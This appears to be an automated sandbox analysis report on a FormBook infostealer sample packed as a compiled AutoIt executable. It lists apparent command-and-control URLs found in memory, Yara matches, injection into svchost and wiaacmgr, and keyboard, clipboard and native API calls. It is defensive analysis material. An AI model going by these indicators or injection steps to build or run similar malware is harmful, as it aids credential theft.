Source: wiaacmgr.exe, 00000005.00000002.2597992420.0000000005EA6000.00000004.10000000.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000008.00000002.2597086045.0000000003236000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://pku-cs-cjw.top/k3hn/?rVu4SxF=dZddn2QnmIt3Z4tuH0E3g34XkYAItSNhr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSp
Source: wiaacmgr.exe, 00000005.00000002.2597992420.0000000006038000.00000004.10000000.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000008.00000002.2597086045.00000000033C8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.ausyva4.top/al74/?JXYh=X6eL8Vp0&rVu4SxF=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E
Source: kObgmFzfBE.exe, 00000008.00000002.2598461928.000000000516C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.opro.vip
Source: kObgmFzfBE.exe, 00000008.00000002.2598461928.000000000516C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.opro.vip/3oq9/
Source: wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: wiaacmgr.exe, 00000005.00000002.2595170542.00000000034C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: wiaacmgr.exe, 00000005.00000002.2595170542.00000000034C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: wiaacmgr.exe, 00000005.00000003.1766615673.0000000008399000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: wiaacmgr.exe, 00000005.00000002.2595170542.00000000034C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: wiaacmgr.exe, 00000005.00000002.2595170542.00000000034C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: wiaacmgr.exe, 00000005.00000002.2595170542.00000000034C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wiaacmgr.exe, 00000005.00000002.2595170542.00000000034C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: wiaacmgr.exe, 00000005.00000002.2599672177.0000000008110000.00000004.00000800.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2597992420.00000000061CA000.00000004.10000000.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000008.00000002.2597086045.000000000355A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: wiaacmgr.exe, 00000005.00000002.2597992420.000000000635C000.00000004.10000000.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000008.00000002.2597086045.00000000036EC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.juewucangku.xyz/b6bc/?JXYh=X6eL8Vp0&rVu4SxF=xoBYbUYuit1npWAwAtyehE3iQkiUZWMjRZPyJ7i/hpkE

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00B84164

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B84164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00B84164

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B83F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00B83F66

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B7001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00B7001C

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B9CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00B9CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2596615908.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2596676816.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1592353153.0000000006790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2594866519.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1596603872.00000000084A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2598461928.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2596411937.00000000057A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1591098519.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00B13B3A
Source: AuKUol8SPU.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: AuKUol8SPU.exe, 00000000.00000000.1355869180.0000000000BC4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e3c039ff-b
Source: AuKUol8SPU.exe, 00000000.00000000.1355869180.0000000000BC4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_647a55c9-a
Source: AuKUol8SPU.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c183af6f-e
Source: AuKUol8SPU.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_584f6562-e

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042CB43 NtClose,	2_2_0042CB43
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040AA5A NtDelayExecution,	2_2_0040AA5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72B60 NtClose,LdrInitializeThunk,	2_2_03C72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03C72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C735C0 NtCreateMutant,LdrInitializeThunk,	2_2_03C735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C74340 NtSetContextThread,	2_2_03C74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C74650 NtSuspendThread,	2_2_03C74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72BE0 NtQueryValueKey,	2_2_03C72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72BF0 NtAllocateVirtualMemory,	2_2_03C72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72B80 NtQueryInformationFile,	2_2_03C72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72BA0 NtEnumerateValueKey,	2_2_03C72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72AD0 NtReadFile,	2_2_03C72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72AF0 NtWriteFile,	2_2_03C72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72AB0 NtWaitForSingleObject,	2_2_03C72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72FE0 NtCreateFile,	2_2_03C72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72F90 NtProtectVirtualMemory,	2_2_03C72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72FA0 NtQuerySection,	2_2_03C72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72FB0 NtResumeThread,	2_2_03C72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72F60 NtCreateProcessEx,	2_2_03C72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72F30 NtCreateSection,	2_2_03C72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72EE0 NtQueueApcThread,	2_2_03C72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72E80 NtReadVirtualMemory,	2_2_03C72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72EA0 NtAdjustPrivilegesToken,	2_2_03C72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72E30 NtWriteVirtualMemory,	2_2_03C72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72DD0 NtDelayExecution,	2_2_03C72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72DB0 NtEnumerateKey,	2_2_03C72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72D00 NtSetInformationFile,	2_2_03C72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72D10 NtMapViewOfSection,	2_2_03C72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72D30 NtUnmapViewOfSection,	2_2_03C72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72CC0 NtQueryVirtualMemory,	2_2_03C72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72CF0 NtOpenProcess,	2_2_03C72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72CA0 NtQueryInformationToken,	2_2_03C72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72C60 NtCreateKey,	2_2_03C72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72C70 NtFreeVirtualMemory,	2_2_03C72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72C00 NtQueryInformationProcess,	2_2_03C72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C73090 NtSetValueKey,	2_2_03C73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C73010 NtOpenDirectoryObject,	2_2_03C73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C739B0 NtGetContextThread,	2_2_03C739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C73D70 NtOpenThread,	2_2_03C73D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C73D10 NtOpenProcessToken,	2_2_03C73D10
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05374650 NtSuspendThread,LdrInitializeThunk,	5_2_05374650
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05374340 NtSetContextThread,LdrInitializeThunk,	5_2_05374340
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_05372D30
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_05372D10
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_05372DF0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372DD0 NtDelayExecution,LdrInitializeThunk,	5_2_05372DD0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_05372C70
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372C60 NtCreateKey,LdrInitializeThunk,	5_2_05372C60
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_05372CA0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372F30 NtCreateSection,LdrInitializeThunk,	5_2_05372F30
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372FB0 NtResumeThread,LdrInitializeThunk,	5_2_05372FB0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372FE0 NtCreateFile,LdrInitializeThunk,	5_2_05372FE0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_05372E80
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_05372EE0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372B60 NtClose,LdrInitializeThunk,	5_2_05372B60
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372BA0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_05372BA0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_05372BF0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_05372BE0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372AF0 NtWriteFile,LdrInitializeThunk,	5_2_05372AF0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372AD0 NtReadFile,LdrInitializeThunk,	5_2_05372AD0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053735C0 NtCreateMutant,LdrInitializeThunk,	5_2_053735C0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_053739B0 NtGetContextThread,LdrInitializeThunk,	5_2_053739B0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372D00 NtSetInformationFile,	5_2_05372D00
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372DB0 NtEnumerateKey,	5_2_05372DB0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372C00 NtQueryInformationProcess,	5_2_05372C00
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372CF0 NtOpenProcess,	5_2_05372CF0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372CC0 NtQueryVirtualMemory,	5_2_05372CC0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372F60 NtCreateProcessEx,	5_2_05372F60
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372FA0 NtQuerySection,	5_2_05372FA0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372F90 NtProtectVirtualMemory,	5_2_05372F90
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372E30 NtWriteVirtualMemory,	5_2_05372E30
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372EA0 NtAdjustPrivilegesToken,	5_2_05372EA0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372B80 NtQueryInformationFile,	5_2_05372B80
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05372AB0 NtWaitForSingleObject,	5_2_05372AB0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05373010 NtOpenDirectoryObject,	5_2_05373010
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05373090 NtSetValueKey,	5_2_05373090
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05373D10 NtOpenProcessToken,	5_2_05373D10
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_05373D70 NtOpenThread,	5_2_05373D70
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_03289720 NtReadFile,	5_2_03289720
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_032895B0 NtCreateFile,	5_2_032895B0
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_03289A20 NtAllocateVirtualMemory,	5_2_03289A20
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_03289810 NtDeleteFile,	5_2_03289810
Source: C:\Windows\SysWOW64\wiaacmgr.exe	Code function: 5_2_032898B0 NtClose,	5_2_032898B0

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B7A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00B7A1EF

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B68310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00B68310

Source: C:\Users\user\Desktop\AuKUol8SPU.exe

Code function: 0_2_00B751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00B751BD

Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B1E6A0	0_2_00B1E6A0
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B3D975	0_2_00B3D975
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B1FCE0	0_2_00B1FCE0
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B1DF00	0_2_00B1DF00
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B321C5	0_2_00B321C5
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B462D2	0_2_00B462D2
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B903DA	0_2_00B903DA
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B4242E	0_2_00B4242E
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B325FA	0_2_00B325FA
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B266E1	0_2_00B266E1
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B6E616	0_2_00B6E616
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B4878F	0_2_00B4878F
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B78889	0_2_00B78889
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B28808	0_2_00B28808
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B90857	0_2_00B90857
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B46844	0_2_00B46844
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B3CB21	0_2_00B3CB21
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B46DB6	0_2_00B46DB6
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B26F9E	0_2_00B26F9E
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B23030	0_2_00B23030
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B33187	0_2_00B33187
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B3F1D9	0_2_00B3F1D9
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B11287	0_2_00B11287
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B31484	0_2_00B31484
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B25520	0_2_00B25520
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B37696	0_2_00B37696
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B25760	0_2_00B25760
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B31978	0_2_00B31978
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B49AB5	0_2_00B49AB5
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B3BDA6	0_2_00B3BDA6
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B31D90	0_2_00B31D90
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B97DDB	0_2_00B97DDB
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_00B23FE0	0_2_00B23FE0
Source: C:\Users\user\Desktop\AuKUol8SPU.exe	Code function: 0_2_04103670	0_2_04103670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418A23	2_2_00418A23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403010	2_2_00403010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042F173	2_2_0042F173
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041024A	2_2_0041024A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410253	2_2_00410253
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401220	2_2_00401220
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402B80	2_2_00402B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004043B5	2_2_004043B5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410473	2_2_00410473
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E473	2_2_0040E473
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416C10	2_2_00416C10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416C13	2_2_00416C13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004024D0	2_2_004024D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E5C3	2_2_0040E5C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E5B8	2_2_0040E5B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402740	2_2_00402740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4E3F0	2_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D003E6	2_2_03D003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFA352	2_2_03CFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC02C0	2_2_03CC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE0274	2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF81CC	2_2_03CF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF41A2	2_2_03CF41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D001AA	2_2_03D001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC8158	2_2_03CC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C30100	2_2_03C30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDA118	2_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD2000	2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3C7C0	2_2_03C3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C64750	2_2_03C64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40770	2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5C6E0	2_2_03C5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D00591	2_2_03D00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40535	2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEE4F6	2_2_03CEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF2446	2_2_03CF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE4420	2_2_03CE4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF6BD7	2_2_03CF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFAB40	2_2_03CFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0	2_2_03C429A0
